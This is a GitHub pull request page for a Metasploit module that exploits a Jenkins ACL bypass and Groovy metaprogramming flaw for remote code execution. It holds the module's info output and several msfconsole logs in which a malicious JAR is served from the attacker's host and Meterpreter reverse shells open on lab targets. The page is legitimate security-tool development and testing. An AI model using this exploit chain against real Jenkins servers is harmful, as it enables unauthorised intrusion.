Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Jenkins ACL bypass and metaprogramming RCE #11466

Merged
merged 5 commits into from Mar 18, 2019

Conversation

@wvu-r7
Copy link
Contributor

wvu-r7 commented Feb 23, 2019

WIP 馃嵒

To-do

  • Add check method
  • Randomize strings
  • Clean up JAR (#11530)
  • ???

Usage

msf5 exploit(multi/http/jenkins_metaprogramming) > info

       Name: Jenkins ACL Bypass and Metaprogramming RCE
     Module: exploit/multi/http/jenkins_metaprogramming
   Platform: Java
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-01-08

Provided by:
  Orange Tsai
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     127.0.0.1        yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8081             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path to Jenkins
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Jenkins dynamic routing to
  bypass the Overall/Read ACL and leverage Groovy metaprogramming to
  download and execute a malicious JAR file. The ACL bypass gadget is
  specific to Jenkins <= 2.137 and will not work on later versions of
  Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin
  2.61.

References:
  https://cvedetails.com/cve/CVE-2019-1003000/
  https://cvedetails.com/cve/CVE-2019-1003001/
  https://cvedetails.com/cve/CVE-2019-1003002/
  https://www.exploit-db.com/exploits/46427
  https://jenkins.io/security/advisory/2019-01-08/
  https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
  https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
  https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 6f21b8da2915
OS          : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >
wvu@kharak:~$ for i in {0..9}; do curl http://127.0.0.1:8081/path/to/wrong/payload.jar; done
I'll index the mobile CSS driver, that should circuit the TCP driver!
If we calculate the hard drive, we can get to the COM driver through the cross-platform ADP matrix!
I'll copy the bluetooth JBOD panel, that should panel the GB transmitter!
Try to quantify the PCI driver, maybe it will synthesize the mobile protocol!
The SMTP array is down, calculate the neural transmitter so we can bypass the SDD application!
Try to copy the SAS application, maybe it will calculate the mobile transmitter!
You can't transmit the interface without synthesizing the cross-platform COM pixel!
Try to input the RSS capacitor, maybe it will calculate the redundant capacitor!
The SCSI microchip is down, parse the open-source alarm so we can parse the IB array!
You can't index the driver without calculating the optical PNG bus!
wvu@kharak:~$

Resolves #11459.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from f3c0352 to bd8ff8c Feb 23, 2019
@wvu-r7 wvu-r7 added the needs-docs label Feb 23, 2019
@jrobles-r7 jrobles-r7 self-assigned this Mar 5, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 3 times, most recently from 48bc498 to 9b7118c Mar 6, 2019
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Mar 6, 2019

msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Using URL: http://172.22.222.136:8080/metasploit/exploit/1.0/exploit-1.0.jar
[*] Sending stage (53866 bytes) to 172.22.222.135
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.135:39154) at 2019-03-06 07:21:32 -0600
[*] Server stopped.

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 72c4b46de4df
OS          : Linux 4.18.0-15-generic (amd64)
Meterpreter : java/linux
meterpreter > 
@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Mar 6, 2019

I've got a big commit addressing the current to-dos, but I introduced a regression that causes the exploit to fail. Still hunting that down. 馃槄

This is fixed now. The regression was in handling HEAD vs. GET and .pom vs. .jar in on_request_uri with respect to the resource given to start_service.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 3 times, most recently from a100b42 to a46303b Mar 12, 2019
@wvu-r7 wvu-r7 changed the title [WIP] Add Jenkins ACL bypass and metaprogramming RCE Add Jenkins ACL bypass and metaprogramming RCE Mar 15, 2019
@wvu-r7 wvu-r7 removed the delayed label Mar 15, 2019
@wvu-r7 wvu-r7 marked this pull request as ready for review Mar 15, 2019
@wvu-r7 wvu-r7 removed the needs-docs label Mar 15, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 4469964 to 56c8b17 Mar 15, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 53fd730 to 4cc5803 Mar 16, 2019
@wvu-r7 wvu-r7 added the delayed label Mar 16, 2019
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Mar 16, 2019

FWIW; may be useful for testing or documentation: https://www.turnkeylinux.org/jenkins

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Mar 16, 2019

Looks like for TurnKey, you want to download https://www.turnkeylinux.org/download?file=turnkey-jenkins-15.0-stretch-amd64.iso and then install https://updates.jenkins.io/download/plugins/workflow-cps/2.61/workflow-cps.hpi with all its dependencies:

java.io.IOException: Pipeline: Groovy v2.61 failed to load.
 - Script Security Plugin v1.44 is older than required. To fix, install v1.48 or later.
 - Pipeline: API v2.29 is older than required. To fix, install v2.30 or later.
 - Structs Plugin v1.14 is older than required. To fix, install v1.17 or later.
 - ace-editor v1.0.1 is missing. To fix, install v1.0.1 or later.
 - jquery-detached v1.2.1 is missing. To fix, install v1.2.1 or later.
 - workflow-support v2.21 is missing. To fix, install v2.21 or later.
	at hudson.PluginWrapper.resolvePluginDependencies(PluginWrapper.java:655)
	at hudson.PluginManager.dynamicLoad(PluginManager.java:878)
Caused: java.io.IOException: Failed to install workflow-cps plugin
	at hudson.PluginManager.dynamicLoad(PluginManager.java:888)
	at hudson.PluginManager.dynamicLoad(PluginManager.java:824)
	at hudson.model.UpdateCenter$InstallationJob._run(UpdateCenter.java:1880)
Caused: java.io.IOException: Failed to dynamically deploy this plugin
	at hudson.model.UpdateCenter$InstallationJob._run(UpdateCenter.java:1884)
	at hudson.model.UpdateCenter$DownloadJob.run(UpdateCenter.java:1642)
	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
	at hudson.remoting.AtmostOneThreadExecutor$Worker.run(AtmostOneThreadExecutor.java:112)
	at java.lang.Thread.run(Thread.java:748)

Perhaps this is why it's easier to install it once and then package the Jenkins home directory.

@wvu-r7 wvu-r7 added delayed and removed delayed labels Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 14887e9 to abf4ae7 Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 4 times, most recently from 5ee017c to 59b625c Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 59b625c to e505bf1 Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from e505bf1 to b2c21c7 Mar 16, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Mar 16, 2019

Today I fail at Git.

I tried to create a more reasonable history, but the timestamps were off. I think I've distilled the logical changes into the right commits on an appropriate timeline.

I won't be touching this again. Happy weekend!

@phra
phra approved these changes Mar 17, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Mar 17, 2019

Thanks, @phra. Sorry the HTTPS staging didn't work out.

@phra

This comment has been minimized.

Copy link
Contributor

phra commented Mar 17, 2019

@wvu-r7 no worries, good job!

@jrobles-r7 jrobles-r7 merged commit 6658584 into rapid7:master Mar 18, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
jrobles-r7 added a commit that referenced this pull request Mar 18, 2019
msjenkins-r7 added a commit that referenced this pull request Mar 18, 2019
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Mar 18, 2019

Release Notes

The multi/http/jenkins_metaprogramming exploit module has been added to the framework. This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Mar 18, 2019

$ ./msfconsole -q
msf5 > use exploit/multi/http/jenkins_metaprogramming
msf5 exploit(multi/http/jenkins_metaprogramming) > set rhosts 172.22.222.135
rhosts => 172.22.222.135
msf5 exploit(multi/http/jenkins_metaprogramming) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/http/jenkins_metaprogramming) > set verbose true
verbose => true
msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started HTTPS reverse handler on https://172.22.222.136:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.171.150:8080/
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.pom requested
[-] Sending 404
[*] HEAD /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.jar requested
[+] Sending 200
[*] GET /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.jar requested
[+] Sending payload JAR
[*] https://172.22.222.136:8443 handling request from 172.22.222.135; (UUID: p3enhxfx) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (172.22.222.136:8443 -> 172.22.222.135:48982) at 2019-03-18 07:22:34 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/SpencerHackett' on the target

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 40736eb4c625
OS          : Linux 4.18.0-16-generic (amd64)
Meterpreter : java/linux
meterpreter >
@wvu-r7 wvu-r7 deleted the wvu-r7:feature/jenkins branch Mar 18, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Mar 21, 2019

I lost some changes in the fervent rebasing. I think this is the first time rebasing has bitten me, so I'm a bit surprised. I'll be more careful next time. #11606 addresses the lost changes. Thanks.

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Mar 22, 2019

Notice to visitors

If you're coming here from Twitter or elsewhere, please use Git to manage your copy of this module if at all possible. Otherwise you can find the latest copy here, NOT in this pull request. Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can鈥檛 perform that action at this time.